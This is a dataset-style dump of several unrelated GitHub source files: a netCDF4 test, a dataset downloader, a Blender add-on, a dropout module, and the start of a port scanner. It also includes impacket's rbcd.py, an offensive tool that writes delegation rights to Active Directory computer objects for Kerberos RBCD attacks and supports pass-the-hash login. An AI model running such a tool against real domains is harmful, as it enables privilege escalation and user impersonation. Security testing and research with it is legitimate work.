max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M)
---|---|---|---|---|
test/tst_refcount.py | timgates42/netcdf4-python | 574 | 11186538 | import unittest, netCDF4, tempfile, os
file_name = tempfile.NamedTemporaryFile(suffix='.nc', delete=False).name
class RefCountTestCase(unittest.TestCase):
    def setUp(self):
        nc = netCDF4.Dataset(file_name, mode='w', keepweakref=True, format='NETCDF4')
        d = nc.createDimension('fred', 2000)
        v = nc.createVariable('frank','f',('fred',))
        self.file = file_name
        self.nc = nc
    def tearDown(self):
        # Remove the temporary files
        os.remove(self.file)
    def runTest(self):
        """testing garbage collection (issue 218)"""
        # this should trigger garbage collection (__dealloc__ method)
        del self.nc
        # if __dealloc__ not called to close file, then this
        # will fail with "Permission denied" error (since you can't
        # open a file 'w' that is already open for writing).
        nc = netCDF4.Dataset(self.file, mode='w', format='NETCDF4')
if __name__ == '__main__':
    unittest.main()
|
imdb-wiki-dir/download_imdb_wiki.py | mzl9039/imbalanced-regression | 370 | 11186576 | <gh_stars>100-1000
import os
import wget
print("Downloading IMDB faces...")
imdb_file = "./data/imdb_crop.tar"
wget.download("https://data.vision.ee.ethz.ch/cvl/rrothe/imdb-wiki/static/imdb_crop.tar", out=imdb_file)
print("Downloading WIKI faces...")
wiki_file = "./data/wiki_crop.tar"
wget.download("https://data.vision.ee.ethz.ch/cvl/rrothe/imdb-wiki/static/wiki_crop.tar", out=wiki_file)
print("Extracting IMDB faces...")
os.system(f"tar -xvf {imdb_file} -C ./data")
print("Extracting WIKI faces...")
os.system(f"tar -xvf {wiki_file} -C ./data")
os.remove(imdb_file)
os.remove(wiki_file)
print("\nCompleted!") |
nxt_editor/integration/blender/nxt_blender.py | Mikfr83/nxt_editor | 131 | 11186586 | <gh_stars>100-1000
"""
Loosely based on the example addon from this repo:
https://github.com/robertguetzkow/blender-python-examples
"""
# Builtin
import os
import sys
import subprocess
# External
import bpy
try:
# External
from Qt import QtCore, QtWidgets
# Internal
from nxt_editor.constants import NXT_WEBSITE
from nxt_editor.integration import blender
nxt_installed = True
except ImportError:
nxt_installed = False
NXT_WEBSITE = 'https://nxt-dev.github.io/'
nxt_package_name = 'nxt-editor'
bl_info = {
"name": "NXT Blender",
"blender": (2, 80, 0),
"version": (0, 2, 0),
"location": "NXT > Open Editor",
"wiki_url": "https://nxt-dev.github.io/",
"tracker_url": "https://github.com/nxt-dev/nxt_editor/issues",
"category": "nxt",
"description": "NXT is a general purpose code compositor designed for "
"rigging, scene assembly, and automation. (This is an "
"experimental version of nxt_blender. Save "
"early, save often.)",
"warning": "This addon requires installation of dependencies."
}
class BLENDER_PLUGIN_VERSION(object):
plugin_v_data = {'MAJOR': bl_info["version"][0],
'MINOR': bl_info["version"][1],
'PATCH': bl_info["version"][2]}
MAJOR = plugin_v_data['MAJOR']
MINOR = plugin_v_data['MINOR']
PATCH = plugin_v_data['PATCH']
VERSION_TUPLE = (MAJOR, MINOR, PATCH)
VERSION_STR = '.'.join(str(v) for v in VERSION_TUPLE)
VERSION = VERSION_STR
class CreateBlenderContext(bpy.types.Operator):
bl_label = "Create Remote Blender NXT Context"
bl_idname = "nxt.create_blender_context"
def execute(self, context):
global nxt_installed
if nxt_installed:
b = blender.__NXT_INTEGRATION__
if not b:
b = blender.Blender.launch_nxt()
b.create_context()
else:
show_dependency_warning()
return {'FINISHED'}
class OpenNxtEditor(bpy.types.Operator):
bl_label = "Open NXT Editor"
bl_idname = "nxt.nxt_editor"
def execute(self, context):
global nxt_installed
if nxt_installed:
blender.Blender.launch_nxt()
else:
show_dependency_warning()
return {'FINISHED'}
class AboutNxt(bpy.types.Operator):
bl_label = "Update NXT"
bl_idname = "nxt.nxt_about"
def execute(self, context):
import webbrowser
webbrowser.open_new(NXT_WEBSITE)
return {'FINISHED'}
class TOPBAR_MT_nxt(bpy.types.Menu):
bl_label = "NXT"
def draw(self, context):
layout = self.layout
layout.operator("nxt.nxt_editor", text="Open Editor")
layout.separator()
layout.operator("nxt.nxt_update_dependencies",
text="Update NXT (Requires Blender Restart)")
layout.separator()
layout.operator('nxt.create_blender_context', text='Create Blender '
'Context')
layout.separator()
layout.operator("nxt.nxt_about", text="About")
def menu_draw(self, context):
self.layout.menu("TOPBAR_MT_nxt")
class NxtInstallDependencies(bpy.types.Operator):
bl_idname = 'nxt.nxt_install_dependencies'
bl_label = "Install NXT dependencies"
bl_description = ("Downloads and installs the required python packages "
"for NXT. Internet connection is required. "
"Blender may have to be started with elevated "
"permissions in order to install the package. "
"Alternatively you can pip install nxt-editor into your "
"Blender Python environment.")
bl_options = {"REGISTER", "INTERNAL"}
@classmethod
def poll(cls, context):
global nxt_installed
return not nxt_installed
def execute(self, context):
success = False
environ_copy = dict(os.environ)
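# PYTHONNOUSERSITE=1 keeps pip from resolving or installing into the user site-packages,
# so the package lands in Blender's bundled Python environment.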
environ_copy["PYTHONNOUSERSITE"] = "1"
pkg = 'nxt-editor'
try:
subprocess.run([sys.executable, "-m", "pip", "install", pkg],
check=True, env=environ_copy)
except subprocess.CalledProcessError as e:
self.report({"ERROR"}, str(e))
return {"CANCELLED"}
if not success:
self.report({"INFO"}, 'Please restart Blender to '
'finish installing NXT.')
return {"FINISHED"}
class NxtUpdateDependencies(bpy.types.Operator):
bl_idname = 'nxt.nxt_update_dependencies'
bl_label = "Update NXT dependencies"
bl_description = ("Downloads and updates the required python packages "
"for NXT. Internet connection is required. "
"Blender may have to be started with elevated "
"permissions in order to install the package. "
"Alternatively you can pip install -U nxt-editor into "
"your Blender Python environment.")
bl_options = {"REGISTER", "INTERNAL"}
@classmethod
def poll(cls, context):
global nxt_installed
return nxt_installed
def execute(self, context):
try:
blender.Blender._update_package('nxt-editor')
except subprocess.CalledProcessError as e:
self.report({"ERROR"}, str(e))
return {"CANCELLED"}
self.report({"INFO"}, 'Please restart Blender to '
'finish updating NXT.')
return {"FINISHED"}
class NxtUninstallDependencies(bpy.types.Operator):
bl_idname = 'nxt.nxt_uninstall_dependencies'
bl_label = "Uninstall NXT dependencies"
bl_description = ("Uninstalls the NXT Python packages. "
"Blender may have to be started with elevated "
"permissions in order to install the package. "
"Alternatively you can pip uninstall nxt-editor from "
"your Blender Python environment.")
bl_options = {"REGISTER", "INTERNAL"}
@classmethod
def poll(cls, context):
global nxt_installed
return nxt_installed
def execute(self, context):
try:
blender.Blender().uninstall()
except subprocess.CalledProcessError as e:
self.report({"ERROR"}, str(e))
return {"CANCELLED"}
self.report({"INFO"}, 'Please restart Blender to '
'finish uninstalling NXT dependencies.')
return {"FINISHED"}
class NxtDependenciesPreferences(bpy.types.AddonPreferences):
bl_idname = __name__
def draw(self, context):
layout = self.layout
layout.operator(NxtInstallDependencies.bl_idname, icon="PLUGIN")
layout.operator(NxtUpdateDependencies.bl_idname, icon="SCRIPT")
layout.operator(NxtUninstallDependencies.bl_idname, icon="PANEL_CLOSE")
def show_dependency_warning():
def draw(self, context):
layout = self.layout
lines = [
f"Please install the missing dependencies for the NXT add-on.",
"1. Open the preferences (Edit > Preferences > Add-ons).",
f"2. Search for the \"{bl_info.get('name')}\" add-on.",
"3. Open the details section of the add-on.",
f"4. Click on the \"{NxtInstallDependencies.bl_label}\" button.",
"This will download and install the missing Python packages. "
"You man need to start Blender with elevated permissions",
f"Alternatively you can pip install \"{nxt_package_name}\" into "
f"your Blender Python environment."
]
for line in lines:
layout.label(text=line)
bpy.context.window_manager.popup_menu(draw, title='NXT Warning!',
icon="ERROR")
nxt_operators = (TOPBAR_MT_nxt, OpenNxtEditor, NxtUpdateDependencies,
NxtUninstallDependencies, NxtDependenciesPreferences,
NxtInstallDependencies, CreateBlenderContext)
def register():
global nxt_installed
for cls in nxt_operators:
bpy.utils.register_class(cls)
bpy.utils.register_class(AboutNxt)
bpy.types.TOPBAR_MT_editor_menus.append(TOPBAR_MT_nxt.menu_draw)
def unregister():
try:
if blender.__NXT_INTEGRATION__:
blender.__NXT_INTEGRATION__.quit_nxt()
except NameError:
pass
bpy.types.TOPBAR_MT_editor_menus.remove(TOPBAR_MT_nxt.menu_draw)
for cls in nxt_operators:
bpy.utils.unregister_class(cls)
bpy.utils.unregister_class(AboutNxt)
if __name__ == "__main__":
register()
|
transformer/fairseq/modules/dropout_select.py | joaompereira/adahessian | 162 | 11186605 | <gh_stars>100-1000
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
from torch.nn.parameter import Parameter
import numpy as np
class DropoutSelect(nn.Module):
    """Applies the selected dropout / noise-injection scheme."""
    def __init__(self, dropout_type, dropout_gama=0.5, inplace=False):
        super().__init__()
        self.dropout_type = dropout_type
        self.dropout_gama = dropout_gama
        self.inplace = inplace
        dropout_alpha = 1.0
        self.dropout_alpha = dropout_alpha
        if dropout_type == "bernoulli":
            # multiply based
            self.dist = torch.distributions.bernoulli.Bernoulli( torch.tensor([dropout_gama]) )
        else:
            # inject different types of noise with special control of the variance
            if dropout_type == "gamma":
                self.dist = torch.distributions.gamma.Gamma( torch.tensor([dropout_alpha]), torch.tensor([dropout_gama]) )
            elif dropout_type == "gumbel":
                self.dist = torch.distributions.gumbel.Gumbel( torch.tensor([0.0]), torch.tensor([dropout_gama]) )
            elif dropout_type == "beta":
                self.dist = torch.distributions.beta.Beta( torch.tensor([dropout_alpha]), torch.tensor([dropout_gama]) )
            elif dropout_type == "laplace":
                self.dist = torch.distributions.laplace.Laplace( torch.tensor([0.0]), torch.tensor([dropout_gama]) )
            elif dropout_type == "chi":
                self.dist = torch.distributions.chi2.Chi2( torch.tensor([dropout_gama]) )
            elif dropout_type == "normal":
                self.dist = torch.distributions.normal.Normal( torch.tensor([0.0]), torch.tensor([dropout_gama]) )
    def extra_repr(self):
        return 'dropout_type={dropout_type}, dropout_gama={dropout_gama}, inplace={inplace}'.format(**self.__dict__)
    def forward(self, x, p, training=True):
        if training is False:
            return x
        if self.dropout_type == "none":
            return F.dropout( x, p=p, training=True, inplace=self.inplace )
        elif self.dropout_type == "bernoulli":
            # multiply based
            noise = self.dist.expand( x.shape ).sample().to(x.device)
            scale = p / self.dropout_gama
            x = x * noise * scale
        else:
            noise = self.dist.expand( x.shape ).sample().to(x.device)
            # inject different types of noise with special control of the variance
            if self.dropout_type == "gamma":
                scale = (p - self.dropout_alpha * self.dropout_gama) * ( self.dropout_alpha ** -0.5 )
            elif self.dropout_type == "gumbel":
                scale = (6 ** 0.5) * (p - 0.5772 * self.dropout_gama) / np.pi
            elif self.dropout_type == "beta":
                scale = (self.dropout_alpha + self.dropout_gama) * \
                    (( ( self.dropout_alpha + self.dropout_gama + 1) / self.dropout_alpha ) ** 0.5) * \
                    ( p - self.dropout_alpha / (self.dropout_alpha + self.dropout_gama) )
            elif self.dropout_type == "chi":
                scale = ( p - self.dropout_gama ) / (2 ** 0.5)
            elif self.dropout_type == "normal":
                scale = p
            x = x + noise * scale
        return x
|
nbviewer/providers/url/__init__.py | AI-Collaboratory/nbviewer | 1,840 | 11186614 | <filename>nbviewer/providers/url/__init__.py
from .handlers import default_handlers
from .handlers import uri_rewrites
|
examples/rbcd.py | kamnsv/impacket | 6,612 | 11186636 | <reponame>kamnsv/impacket
#!/usr/bin/env python3
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Python script for handling the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer
#
# Authors:
# <NAME> (@podalirius_)
# <NAME> (@_nwodtuhs)
#
# ToDo:
# [ ]: allow users to set a ((-delegate-from-sid or -delegate-from-dn) and -delegate-to-dn) in order to skip ldapdomaindump and explicitely set the SID/DN
import argparse
import logging
import sys
import traceback
import ldap3
import ssl
import ldapdomaindump
from binascii import unhexlify
import os
from ldap3.protocol.formatters.formatters import format_sid
from impacket import version
from impacket.examples import logger, utils
from impacket.ldap import ldaptypes
from impacket.smbconnection import SMBConnection
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech
from ldap3.utils.conv import escape_filter_chars
def get_machine_name(args, domain):
if args.dc_ip is not None:
s = SMBConnection(args.dc_ip, args.dc_ip)
else:
s = SMBConnection(domain, domain)
try:
s.login('', '')
except Exception:
if s.getServerName() == '':
raise Exception('Error while anonymous logging into %s' % domain)
else:
s.logoff()
return s.getServerName()
def ldap3_kerberos_login(connection, target, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None,
TGT=None, TGS=None, useCache=True):
from pyasn1.codec.ber import encoder, decoder
from pyasn1.type.univ import noValue
"""
logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported.
:param string user: username
:param string password: <PASSWORD>
:param string domain: domain where the account is valid for (required)
:param string lmhash: LMHASH used to authenticate using hashes (password is not used)
:param string nthash: NTHASH used to authenticate using hashes (password is not used)
:param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication
:param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho)
:param struct TGT: If there's a TGT available, send the structure here and it will be used
:param struct TGS: same for TGS. See smb3.py for the format
:param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False
:return: True, raises an Exception if error.
"""
if lmhash != '' or nthash != '':
if len(lmhash) % 2:
lmhash = '0' + lmhash
if len(nthash) % 2:
nthash = '0' + nthash
try: # just in case they were converted already
lmhash = unhexlify(lmhash)
nthash = unhexlify(nthash)
except TypeError:
pass
# Importing down here so pyasn1 is not required if kerberos is not used.
from impacket.krb5.ccache import CCache
from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5 import constants
from impacket.krb5.types import Principal, KerberosTime, Ticket
import datetime
if TGT is not None or TGS is not None:
useCache = False
if useCache:
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except Exception as e:
# No cache present
print(e)
pass
else:
# retrieve domain information from CCache file if needed
if domain == '':
domain = ccache.principal.realm['data'].decode('utf-8')
logging.debug('Domain retrieved from CCache: %s' % domain)
logging.debug('Using Kerberos Cache: %s' % os.getenv('KRB5CCNAME'))
principal = 'ldap/%s@%s' % (target.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is None:
# Let's try for the TGT and go from there
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
logging.debug('Using TGT from cache')
else:
logging.debug('No valid credentials found in cache')
else:
TGS = creds.toTGS(principal)
logging.debug('Using TGS from cache')
# retrieve user information from CCache file if needed
if user == '' and creds is not None:
user = creds['client'].prettyPrint().split(b'@')[0].decode('utf-8')
logging.debug('Username retrieved from CCache: %s' % user)
elif user == '' and len(ccache.principal.components) > 0:
user = ccache.principal.components[0]['data'].decode('utf-8')
logging.debug('Username retrieved from CCache: %s' % user)
# First of all, we need to get a TGT for the user
userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
if TGT is None:
if TGS is None:
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash,
aesKey, kdcHost)
else:
tgt = TGT['KDC_REP']
cipher = TGT['cipher']
sessionKey = TGT['sessionKey']
if TGS is None:
serverName = Principal('ldap/%s' % target, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher,
sessionKey)
else:
tgs = TGS['KDC_REP']
cipher = TGS['cipher']
sessionKey = TGS['sessionKey']
# Let's build a NegTokenInit with a Kerberos REQ_AP
blob = SPNEGO_NegTokenInit()
# Kerberos
blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']]
# Let's extract the ticket from the TGS
tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
ticket = Ticket()
ticket.from_asn1(tgs['ticket'])
# Now let's build the AP_REQ
apReq = AP_REQ()
apReq['pvno'] = 5
apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
opts = []
apReq['ap-options'] = constants.encodeFlags(opts)
seq_set(apReq, 'ticket', ticket.to_asn1)
authenticator = Authenticator()
authenticator['authenticator-vno'] = 5
authenticator['crealm'] = domain
seq_set(authenticator, 'cname', userName.components_to_asn1)
now = datetime.datetime.utcnow()
authenticator['cusec'] = now.microsecond
authenticator['ctime'] = KerberosTime.to_asn1(now)
encodedAuthenticator = encoder.encode(authenticator)
# Key Usage 11
# AP-REQ Authenticator (includes application authenticator
# subkey), encrypted with the application session key
# (Section 5.5.1)
encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)
apReq['authenticator'] = noValue
apReq['authenticator']['etype'] = cipher.enctype
apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
blob['MechToken'] = encoder.encode(apReq)
request = ldap3.operation.bind.bind_operation(connection.version, ldap3.SASL, user, None, 'GSS-SPNEGO',
blob.getData())
# Done with the Kerberos saga, now let's get into LDAP
if connection.closed: # try to open connection if closed
connection.open(read_server_info=False)
connection.sasl_in_progress = True
response = connection.post_send_single_response(connection.send('bindRequest', request, None))
connection.sasl_in_progress = False
if response[0]['result'] != 0:
raise Exception(response)
connection.bound = True
return True
def create_empty_sd():
sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
sd['Revision'] = b'\x01'
sd['Sbz1'] = b'\x00'
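# Control flags: 32772 = 0x8004 (SE_DACL_PRESENT | SE_SELF_RELATIVE)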
sd['Control'] = 32772
sd['OwnerSid'] = ldaptypes.LDAP_SID()
# BUILTIN\Administrators
sd['OwnerSid'].fromCanonical('S-1-5-32-544')
sd['GroupSid'] = b''
sd['Sacl'] = b''
acl = ldaptypes.ACL()
acl['AclRevision'] = 4
acl['Sbz1'] = 0
acl['Sbz2'] = 0
acl.aces = []
sd['Dacl'] = acl
return sd
# Create an ALLOW ACE with the specified sid
def create_allow_ace(sid):
nace = ldaptypes.ACE()
nace['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
nace['AceFlags'] = 0x00
acedata = ldaptypes.ACCESS_ALLOWED_ACE()
acedata['Mask'] = ldaptypes.ACCESS_MASK()
acedata['Mask']['Mask'] = 983551 # Full control
acedata['Sid'] = ldaptypes.LDAP_SID()
acedata['Sid'].fromCanonical(sid)
nace['Ace'] = acedata
return nace
class RBCD(object):
"""docstring for setrbcd"""
def __init__(self, ldap_server, ldap_session, delegate_to):
super(RBCD, self).__init__()
self.ldap_server = ldap_server
self.ldap_session = ldap_session
self.delegate_from = None
self.delegate_to = delegate_to
self.SID_delegate_from = None
self.DN_delegate_to = None
logging.debug('Initializing domainDumper()')
cnf = ldapdomaindump.domainDumpConfig()
cnf.basepath = None
self.domain_dumper = ldapdomaindump.domainDumper(self.ldap_server, self.ldap_session, cnf)
def read(self):
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act
self.get_allowed_to_act()
return
def write(self, delegate_from):
self.delegate_from = delegate_from
# Get escalate user sid
result = self.get_user_info(self.delegate_from)
if not result:
logging.error('Account to escalate does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.SID_delegate_from = str(result[1])
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act and build security descriptor including previous data
sd, targetuser = self.get_allowed_to_act()
# writing only if SID not already in list
if self.SID_delegate_from not in [ ace['Ace']['Sid'].formatCanonical() for ace in sd['Dacl'].aces ]:
sd['Dacl'].aces.append(create_allow_ace(self.SID_delegate_from))
self.ldap_session.modify(targetuser['dn'],
{'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE,
[sd.getData()]]})
if self.ldap_session.result['result'] == 0:
logging.info('Delegation rights modified successfully!')
logging.info('%s can now impersonate users on %s via S4U2Proxy', self.delegate_from, self.delegate_to)
else:
if self.ldap_session.result['result'] == 50:
logging.error('Could not modify object, the server reports insufficient rights: %s',
self.ldap_session.result['message'])
elif self.ldap_session.result['result'] == 19:
logging.error('Could not modify object, the server reports a constrained violation: %s',
self.ldap_session.result['message'])
else:
logging.error('The server returned an error: %s', self.ldap_session.result['message'])
else:
logging.info('%s can already impersonate users on %s via S4U2Proxy', self.delegate_from, self.delegate_to)
logging.info('Not modifying the delegation rights.')
# Get list of allowed to act
self.get_allowed_to_act()
return
def remove(self, delegate_from):
self.delegate_from = delegate_from
# Get escalate user sid
result = self.get_user_info(self.delegate_from)
if not result:
logging.error('Account to escalate does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.SID_delegate_from = str(result[1])
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act and build security descriptor including that data
sd, targetuser = self.get_allowed_to_act()
# Remove the entries where SID match the given -delegate-from
sd['Dacl'].aces = [ace for ace in sd['Dacl'].aces if self.SID_delegate_from != ace['Ace']['Sid'].formatCanonical()]
self.ldap_session.modify(targetuser['dn'],
{'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE, [sd.getData()]]})
if self.ldap_session.result['result'] == 0:
logging.info('Delegation rights modified successfully!')
else:
if self.ldap_session.result['result'] == 50:
logging.error('Could not modify object, the server reports insufficient rights: %s',
self.ldap_session.result['message'])
elif self.ldap_session.result['result'] == 19:
logging.error('Could not modify object, the server reports a constrained violation: %s',
self.ldap_session.result['message'])
else:
logging.error('The server returned an error: %s', self.ldap_session.result['message'])
# Get list of allowed to act
self.get_allowed_to_act()
return
def flush(self):
# Get target computer DN
result = self.get_user_info(self.delegate_to)
if not result:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
self.DN_delegate_to = result[0]
# Get list of allowed to act
sd, targetuser = self.get_allowed_to_act()
self.ldap_session.modify(targetuser['dn'], {'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE, []]})
if self.ldap_session.result['result'] == 0:
logging.info('Delegation rights flushed successfully!')
else:
if self.ldap_session.result['result'] == 50:
logging.error('Could not modify object, the server reports insufficient rights: %s',
self.ldap_session.result['message'])
elif self.ldap_session.result['result'] == 19:
logging.error('Could not modify object, the server reports a constrained violation: %s',
self.ldap_session.result['message'])
else:
logging.error('The server returned an error: %s', self.ldap_session.result['message'])
# Get list of allowed to act
self.get_allowed_to_act()
return
def get_allowed_to_act(self):
# Get target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute
self.ldap_session.search(self.DN_delegate_to, '(objectClass=*)', search_scope=ldap3.BASE,
attributes=['SAMAccountName', 'objectSid', 'msDS-AllowedToActOnBehalfOfOtherIdentity'])
targetuser = None
for entry in self.ldap_session.response:
if entry['type'] != 'searchResEntry':
continue
targetuser = entry
if not targetuser:
logging.error('Could not query target user properties')
return
try:
sd = ldaptypes.SR_SECURITY_DESCRIPTOR(
data=targetuser['raw_attributes']['msDS-AllowedToActOnBehalfOfOtherIdentity'][0])
if len(sd['Dacl'].aces) > 0:
logging.info('Accounts allowed to act on behalf of other identity:')
for ace in sd['Dacl'].aces:
SID = ace['Ace']['Sid'].formatCanonical()
SamAccountName = self.get_sid_info(ace['Ace']['Sid'].formatCanonical())[1]
logging.info(' %-10s (%s)' % (SamAccountName, SID))
else:
logging.info('Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty')
except IndexError:
logging.info('Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty')
# Create DACL manually
sd = create_empty_sd()
return sd, targetuser
def get_user_info(self, samname):
self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(samname), attributes=['objectSid'])
try:
dn = self.ldap_session.entries[0].entry_dn
sid = format_sid(self.ldap_session.entries[0]['objectSid'].raw_values[0])
return dn, sid
except IndexError:
logging.error('User not found in LDAP: %s' % samname)
return False
def get_sid_info(self, sid):
self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % escape_filter_chars(sid), attributes=['samaccountname'])
try:
dn = self.ldap_session.entries[0].entry_dn
samname = self.ldap_session.entries[0]['samaccountname']
return dn, samname
except IndexError:
logging.error('SID not found in LDAP: %s' % sid)
return False
def parse_args():
parser = argparse.ArgumentParser(add_help=True,
description='Python (re)setter for property msDS-AllowedToActOnBehalfOfOtherIdentity for Kerberos RBCD attacks.')
parser.add_argument('identity', action='store', help='domain.local/username[:password]')
parser.add_argument("-delegate-to", type=str, required=True,
help="Target computer account the attacker has at least WriteProperty to")
parser.add_argument("-delegate-from", type=str, required=False,
help="Attacker controlled machine account to write on the msDS-Allo[...] property (only when using `-action write`)")
parser.add_argument('-action', choices=['read', 'write', 'remove', 'flush'], nargs='?', default='read',
help='Action to operate on msDS-AllowedToActOnBehalfOfOtherIdentity')
parser.add_argument('-use-ldaps', action='store_true', help='Use LDAPS instead of LDAP')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true",
help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If '
'omitted it will use the domain part (FQDN) specified in '
'the identity parameter')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def parse_identity(args):
domain, username, password = utils.parse_credentials(args.identity)
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
if password == '' and username != '' and args.hashes is None and args.no_pass is False and args.aesKey is None:
from getpass import getpass
logging.info("No credentials supplied, supply password")
password = getpass("Password:")
if args.aesKey is not None:
args.k = True
if args.hashes is not None:
lmhash, nthash = args.hashes.split(':')
else:
lmhash = ''
nthash = ''
return domain, username, password, lmhash, nthash
def init_logger(args):
# Init the example's logger theme and debug level
logger.init(args.ts)
if args.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
def init_ldap_connection(target, tls_version, args, domain, username, password, lmhash, nthash):
user = '%s\\%s' % (domain, username)
if tls_version is not None:
use_ssl = True
port = 636
tls = ldap3.Tls(validate=ssl.CERT_NONE, version=tls_version)
else:
use_ssl = False
port = 389
tls = None
ldap_server = ldap3.Server(target, get_info=ldap3.ALL, port=port, use_ssl=use_ssl, tls=tls)
if args.k:
ldap_session = ldap3.Connection(ldap_server)
ldap_session.bind()
ldap3_kerberos_login(ldap_session, target, username, password, domain, lmhash, nthash, args.aesKey, kdcHost=args.dc_ip)
elif args.hashes is not None:
ldap_session = ldap3.Connection(ldap_server, user=user, password=lmhash + ":" + nthash, authentication=ldap3.NTLM, auto_bind=True)
else:
ldap_session = ldap3.Connection(ldap_server, user=user, password=password, authentication=ldap3.NTLM, auto_bind=True)
return ldap_server, ldap_session
def init_ldap_session(args, domain, username, password, lmhash, nthash):
if args.k:
target = get_machine_name(args, domain)
else:
if args.dc_ip is not None:
target = args.dc_ip
else:
target = domain
if args.use_ldaps is True:
try:
return init_ldap_connection(target, ssl.PROTOCOL_TLSv1_2, args, domain, username, password, lmhash, nthash)
except ldap3.core.exceptions.LDAPSocketOpenError:
return init_ldap_connection(target, ssl.PROTOCOL_TLSv1, args, domain, username, password, lmhash, nthash)
else:
return init_ldap_connection(target, None, args, domain, username, password, lmhash, nthash)
def main():
print(version.BANNER)
args = parse_args()
init_logger(args)
if args.action == 'write' and args.delegate_from is None:
logging.critical('`-delegate-from` should be specified when using `-action write` !')
sys.exit(1)
domain, username, password, lmhash, nthash = parse_identity(args)
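# An NT hash alone is enough to authenticate; pad with the LM hash of an empty password so the LMHASH:NTHASH pair stays well formed.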
if len(nthash) > 0 and lmhash == "":
lmhash = "aad3b435b51404eeaad3b435b51404ee"
try:
ldap_server, ldap_session = init_ldap_session(args, domain, username, password, lmhash, nthash)
rbcd = RBCD(ldap_server, ldap_session, args.delegate_to)
if args.action == 'read':
rbcd.read()
elif args.action == 'write':
rbcd.write(args.delegate_from)
elif args.action == 'remove':
rbcd.remove(args.delegate_from)
elif args.action == 'flush':
rbcd.flush()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
traceback.print_exc()
logging.error(str(e))
if __name__ == '__main__':
main()
|
Python/Port_Scanner.py | thefool76/hacktoberfest2021 | 448 | 11186656 | <filename>Python/Port_Scanner.py
import socket
import time
portlist = {
"20" : "ftp data transfer",
"21" : "ftp command control",
"22" : "ssh",
"23" : "telnet",
"25" : "smpt",
"53" : "dns",
"80" : "http",
"110" : "pop3",
"111" : "rpcbind",
"119" : "nntp",
